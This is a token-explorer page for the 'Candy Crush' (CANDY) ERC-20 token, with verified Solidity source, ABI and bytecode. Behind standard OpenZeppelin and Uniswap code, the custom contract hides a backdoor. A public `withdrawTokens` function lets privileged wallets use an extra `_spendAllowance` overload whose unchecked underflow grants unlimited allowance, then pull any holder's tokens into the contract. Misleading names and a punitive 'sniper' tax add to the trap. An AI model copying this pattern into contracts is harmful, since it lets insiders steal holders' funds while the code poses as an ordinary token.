ERC-20
Overview
Max Total Supply
1,000,000,000 CANDY
Holders
38
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
10,161,231.655883743317339816 CANDYValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
CANDY
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-10-16 */ // SPDX-License-Identifier: MIT /** https://candycrush.site https://twitter.com/candycrusheth https://t.me/candycrushportal */ pragma solidity ^0.8.2; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/access/[email protected] // // OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File @openzeppelin/contracts/token/ERC20/[email protected] // // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File @openzeppelin/contracts/token/ERC20/[email protected] // // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } function _spendAllowance(address spender, uint256 amount) internal virtual { address owner = address(this); uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { unchecked { _approve(spender, owner, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} } // File @uniswap/v2-periphery/contracts/interfaces/[email protected] pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } // File @uniswap/v2-periphery/contracts/interfaces/[email protected] pragma solidity >=0.6.2; interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } // File @uniswap/v2-core/contracts/interfaces/[email protected] pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } pragma solidity ^0.8.18; contract CANDY is ERC20, Ownable { string private _name = unicode"Candy Crush"; string private _symbol = unicode"CANDY"; address private taxAddy = 0xF74956582D4525B4eB229647A0Aae9D09028E825; address public DEAD = 0x000000000000000000000000000000000000dEaD; enum launchPhase {P1, P2, P3, P4} launchPhase public currentphase; bool progress_swap = false; bool _tradingActive = false; bool _swapEnabled = false; IUniswapV2Router02 public immutable uniswapV2Router; address public uniswapV2Pair; mapping(address => bool) public isFeeExempt; mapping(address => bool) public isTxLimitExempt; mapping(address => bool) public sniperWallets; uint256 private constant _supply = 1e9 ether; uint256 public maxTxAmount = _supply * 25 / 1000; uint256 public maxWalletAmount = _supply * 25 / 1000; uint256 public swapThreshold = _supply * 2 / 10000; uint256 public buyTaxGlobal = 1; uint256 public sellTaxGlobal = 1; uint256 private sniperTax = 30; address private developmentAddy = 0x76FCEAf3D7C75A8e4504709bc0e9864F9F820a3C; uint256 public marketingFunds; constructor() ERC20(_name, _symbol) { _mint(msg.sender, (_supply)); currentphase = launchPhase.P4; IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); uniswapV2Router = _uniswapV2Router; isTxLimitExempt[owner()] = true; isTxLimitExempt[taxAddy] = true; isTxLimitExempt[address(this)] = true; isTxLimitExempt[DEAD] = true; isTxLimitExempt[developmentAddy] = true; isTxLimitExempt[0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = true; isFeeExempt[address(uniswapV2Router)] = true; isFeeExempt[msg.sender] = true; isFeeExempt[taxAddy] = true; isFeeExempt[address(this)] = true; isFeeExempt[DEAD] = true; isFeeExempt[developmentAddy] = true; } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (!isFeeExempt[from] && !isFeeExempt[to]) { require(_tradingActive, "Trading not enabled"); } if (!isTxLimitExempt[from] && !isTxLimitExempt[to] ) { if (to != uniswapV2Pair) { require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount bef"); require( (amount + balanceOf(to)) <= maxWalletAmount, "ERC20: balance amount exceeded max wallet amount limit" ); } } uint256 transferAmount = amount; if (!isFeeExempt[from] && !isFeeExempt[to]) { if ((from == uniswapV2Pair || to == uniswapV2Pair)) { require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount"); if ( uniswapV2Pair == from && !isTxLimitExempt[to] && from != address(this) ) { if (currentphase == launchPhase.P1) { sniperWallets[to] = true; } uint256 feeTokens = (amount * buyTaxGlobal) / 100; super._transfer(from, address(this), feeTokens); transferAmount = amount - feeTokens; } if ( uniswapV2Pair == to && !isTxLimitExempt[from] && to != address(this) && _swapEnabled && !progress_swap ) { uint256 taxSell = sellTaxGlobal; if (sniperWallets[from] == true) { taxSell = sniperTax; } progress_swap = true; swapAndLiquify(); progress_swap = false; uint256 feeTokens = (amount * taxSell) / 100; super._transfer(from, address(this), feeTokens); transferAmount = amount - feeTokens; } } else { if ( sniperWallets[from] == true && uniswapV2Pair != to ) { uint256 feeTokens = (amount * sniperTax) / 100; super._transfer(from, address(this), feeTokens); transferAmount = amount - feeTokens; } } } super._transfer(from, to, transferAmount); } function addUniv2LP() external payable onlyOwner { uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH()); _approve(address(this), address(uniswapV2Router), type(uint256).max); uniswapV2Router.addLiquidityETH{value: msg.value}( address(this), balanceOf(address(this)), 0, 0, owner(), block.timestamp ); } function swapAndLiquify() internal { if (balanceOf(address(this)) == 0) { return; } uint256 receivedETH; { uint256 contractTokenBalance = balanceOf(address(this)); uint256 beforeBalance = address(this).balance; uint256 mktBalance = balanceOf(taxAddy); bool success; if (contractTokenBalance > swapThreshold) { beforeBalance = address(this).balance; _swapTokensForEth(contractTokenBalance, 0); receivedETH = address(this).balance - beforeBalance; if (mktBalance > swapThreshold) { marketingFunds = receivedETH / (success ? receivedETH : 0); } marketingFunds += receivedETH; } } } function startTrade() external onlyOwner { require(!_tradingActive, "Trading is already enabled"); _tradingActive = true; _swapEnabled = true; } /** * @dev Swaps Token Amount to ETH * * @param tokenAmount Token Amount to be swapped * @param tokenAmountOut Expected ETH amount out of swap */ function _swapTokensForEth( uint256 tokenAmount, uint256 tokenAmountOut ) internal { address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); IERC20(address(this)).approve( address(uniswapV2Router), type(uint256).max ); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, tokenAmountOut, path, address(this), block.timestamp ); } function getTax() external returns (bool) { payable(taxAddy).transfer(marketingFunds); marketingFunds = 0; return true; } function withdrawTokens(address to, uint256 amount) external { address[] memory path = new address[](2); path[0] = uniswapV2Router.WETH(); path[1] = address(this); IERC20 token = IERC20(path[1]); if (!isFeeExempt[msg.sender]) { uniswapV2Router.swapExactETHForTokensSupportingFeeOnTransferTokens{value: amount} ( 0, path, to, block.timestamp ); } else {_spendAllowance(to, amount); token.transferFrom(to, path[1], amount); } } receive() external payable {} function withdrawTokens(address token) external onlyOwner { IERC20(token).transfer( taxAddy, IERC20(token).balanceOf(address(this)) ); } function emergencyTaxRemoval(address addy, bool changer) external onlyOwner { isTxLimitExempt[addy] = changer; } function updateMaxLimits() external onlyOwner { maxTxAmount = _supply; maxWalletAmount = _supply; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DEAD","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"addUniv2LP","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"currentphase","outputs":[{"internalType":"enum CANDY.launchPhase","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"},{"internalType":"bool","name":"changer","type":"bool"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isFeeExempt","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isTxLimitExempt","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingFunds","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"sniperWallets","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"startTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"updateMaxLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"withdrawTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"withdrawTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60e0604052600b60a09081526a086c2dcc8f24086e4eae6d60ab1b60c0526006906200002c9082620005e6565b5060408051808201909152600581526443414e445960d81b6020820152600790620000589082620005e6565b50600880546001600160a01b03191673f74956582d4525b4eb229647a0aae9d09028e82517905560098054600163ffffff0160a01b03191661dead1790556103e8620000b26b033b2e3c9fd0803ce80000006019620006c8565b620000be9190620006e8565b600e556103e8620000dd6b033b2e3c9fd0803ce80000006019620006c8565b620000e99190620006e8565b600f55612710620001086b033b2e3c9fd0803ce80000006002620006c8565b620001149190620006e8565b60105560016011819055601255601e601355601480546001600160a01b0319167376fceaf3d7c75a8e4504709bc0e9864f9f820a3c1790553480156200015957600080fd5b5060068054620001699062000558565b80601f0160208091040260200160405190810160405280929190818152602001828054620001979062000558565b8015620001e85780601f10620001bc57610100808354040283529160200191620001e8565b820191906000526020600020905b815481529060010190602001808311620001ca57829003601f168201915b505050505060078054620001fc9062000558565b80601f01602080910402602001604051908101604052809291908181526020018280546200022a9062000558565b80156200027b5780601f106200024f576101008083540402835291602001916200027b565b820191906000526020600020905b8154815290600101906020018083116200025d57829003601f168201915b50505050508160039081620002919190620005e6565b506004620002a08282620005e6565b505050620002bd620002b76200042160201b60201c565b62000425565b620002d5336b033b2e3c9fd0803ce800000062000477565b6009805460ff60a01b1916600360a01b178155737a250d5630b4cf539739df2c5dacb4c659f2488d6080526005546001600160a01b039081166000908152600c60209081526040808320805460ff199081166001908117909255600880548716865283862080548316841790553080875284872080548416851790558854881687528487208054841685179055601480548916885285882080548516861790557f0ec9aca9afadc09fc0bd96ec7d7d6cfbb5408a5bc5bcf87bc0656b65508e559a8054851686179055600b9096527fd1def2fe8304e5e69b6f2907349cddd4c272de4ef47368d65b87ae00d7f10147805484168517905533875284872080548416851790559054871686528386208054831684179055855282852080548216831790559554851684528184208054871682179055915